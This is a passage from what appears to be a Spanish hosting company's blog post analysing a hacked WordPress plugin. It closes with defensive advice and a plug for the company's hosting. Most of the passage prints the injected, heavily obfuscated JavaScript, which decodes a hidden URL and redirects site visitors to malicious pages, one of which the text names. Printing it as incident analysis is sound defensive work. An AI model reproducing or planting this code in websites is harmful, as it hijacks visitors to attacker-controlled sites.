_0x53d8e8=String[_0x1e6662(_0xecd50d[0x1a],_0xecd50d[0x1b])](104, 116, 116, 112, 115, 58, 47, 47, 99, 108, 105, 99, 107, 46, 110, 101, 119, 115, 102, 101, 101, 100, 46, 115, 117, 112, 112, 111, 114, 116, 47, 101, 115, 117, 122, 110, 120, 105, 102, 113, 107);document[_0x1e6662(_0xecd50d[0x1c],_0xecd50d[0x1d])][_0xecd50d[0xd]](_0x53d8e8);window[_0x1e6662(_0xecd50d[0x20],_0xecd50d[0x21])][_0x1e6662(_0xecd50d[0x1e],_0xecd50d[0x1f])]=_0x53d8e8;document[_0x1e6662(_0xecd50d[0x20],_0xecd50d[0x21])][_0xecd50d[0x22]]=_0x53d8e8;
}

function aASDFAAEAEHFGvF32(){
var _0x35c2=[‘\x77\x72\x70\x48\x4d\x38\x4b\x57\x54\x32\x37\x44\x71\x77\x3d\x3d’,’\x77\x72\x42\x79\x44\x58\x6f\x77\x41\x73\x4b\x43\x77\x34\x30\x3d’,’\x62\x54\x6e\x43\x6f\x33\x63\x3d’];(function(_0x5c8663,_0x5cd826){var _0x439316=function(_0x1cde76){while(–_0x1cde76){_0x5c8663[‘push’](_0x5c8663[‘shift’]());}};_0x439316(++_0x5cd826);}(_0x35c2,0x102));var _0x4336=function(_0x12ebc7,_0x1a4f1c){_0x12ebc7=_0x12ebc7-0x0;var _0x5a9adc=_0x35c2[_0x12ebc7];if(_0x4336[‘vdBqBT’]===undefined){(function(){var _0x183fa7=function(){var _0x327ef5;try{_0x327ef5=Function(‘return\x20(function()\x20’+'{}.constructor(\x22return\x20this\x22)(\x20)’+’);’)();}catch(_0x32d85b){_0x327ef5=window;}return _0x327ef5;};var _0x27cb86=_0x183fa7();var _0x309966=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;_0x27cb86[‘atob’]||(_0x27cb86[‘atob’]=function(_0x47bccb){var _0x28e3cb=String(_0x47bccb)[‘replace’](/=+$/,”);for(var _0x8b0d0a=0x0,_0x33a00b,_0x549265,_0x58df97=0x0,_0x5e880b=”;_0x549265=_0x28e3cb[‘charAt’](_0x58df97++);~_0x549265&&(_0x33a00b=_0x8b0d0a%0x4?_0x33a00b*0x40+_0x549265:_0x549265,_0x8b0d0a++%0x4)?_0x5e880b+=String[‘fromCharCode’](0xff&_0x33a00b>>(-0x2*_0x8b0d0a&0x6)):0x0){_0x549265=_0x309966[‘indexOf’](_0x549265);}return _0x5e880b;});}());var _0x434173=function(_0x107253,_0x1a4f1c){var _0x2c55ae=[],_0x284508=0x0,_0x23adb9,_0xba911b=”,_0x3daa82=”;_0x107253=atob(_0x107253);for(var _0x4909e6=0x0,_0x475e7d=_0x107253[‘length’];_0x4909e6<_0x475e7d;_0x4909e6++){_0x3daa82+=’%’+(’00’+_0x107253[‘charCodeAt’](_0x4909e6)[‘toString’](0x10))[‘slice’](-0x2);}_0x107253=decodeURIComponent(_0x3daa82);for(var _0x317088=0x0;_0x317088<0x100;_0x317088++){_0x2c55ae[_0x317088]=_0x317088;}for(_0x317088=0x0;_0x317088<0x100;_0x317088++){_0x284508=(_0x284508+_0x2c55ae[_0x317088]+_0x1a4f1c[‘charCodeAt’](_0x317088%_0x1a4f1c[‘length’]))%0x100;_0x23adb9=_0x2c55ae[_0x317088];_0x2c55ae[_0x317088]=_0x2c55ae[_0x284508];_0x2c55ae[_0x284508]=_0x23adb9;}_0x317088=0x0;_0x284508=0x0;for(var _0x5377f0=0x0;_0x5377f0<_0x107253[‘length’];_0x5377f0++){_0x317088=(_0x317088+0x1)%0x100;_0x284508=(_0x284508+_0x2c55ae[_0x317088])%0x100;_0x23adb9=_0x2c55ae[_0x317088];_0x2c55ae[_0x317088]=_0x2c55ae[_0x284508];_0x2c55ae[_0x284508]=_0x23adb9;_0xba911b+=String[‘fromCharCode’](_0x107253[‘charCodeAt’](_0x5377f0)^_0x2c55ae[(_0x2c55ae[_0x317088]+_0x2c55ae[_0x284508])%0x100]);}return _0xba911b;};_0x4336[‘GkSMau’]=_0x434173;_0x4336[‘pKigns’]={};_0x4336[‘vdBqBT’]=!![];}var _0x232be3=_0x4336[‘pKigns’][_0x12ebc7];if(_0x232be3===undefined){if(_0x4336[‘JBGAlj’]===undefined){_0x4336[‘JBGAlj’]=!![];}_0x5a9adc=_0x4336[‘GkSMau’](_0x5a9adc,_0x1a4f1c);_0x4336[‘pKigns’][_0x12ebc7]=_0x5a9adc;}else{_0x5a9adc=_0x232be3;}return _0x5a9adc;};var _0x241731=[_0x4336(‘0x0′,’\x48\x35\x63\x62’),_0x4336(‘0x1′,’\x42\x5b\x69\x70’),_0x4336(‘0x2′,’\x76\x57\x4d\x57’)];document[_0x241731[0x1]][_0x241731[0x0]](sdfgdfg);window[_0x241731[0x1]][_0x241731[0x2]]=sdfgdfg;document[_0x241731[0x1]][_0x241731[0x2]]=sdfgdfg;

}

El código que inyecta, te redirecciona a la URL  http://choisirfemme.tk/index/?4831537102803 que ejecuta las diferentes webs que aparecen.

Conclusión

Elige siempre un equipo de profesionales que pueda ayudarte urgentemenet en el caso que en tu web ocurra este tipo de incidentes (Hosting Profesional WordPress Nova Internet) si ya lo tienes,

elimina inmediatamente el plugin de tu web, como comentamos en los últimos años con nuestros clientes, hay que ser bastante consciente que tener una página en WordPress implica que tanto los plugins, Tema y el CMS deben estár adecuadamente actualizados y con mantenimiento contínuo, además no se echará de menos la aportación positiva que pudiera tener un Waf o Firewall que filtre la entrada de llamadas incluso cerrar determinados paises para que no tengan acceso a este tipo de agujeros que generan más de un dolor de cabeza a la imagen de tu empresa.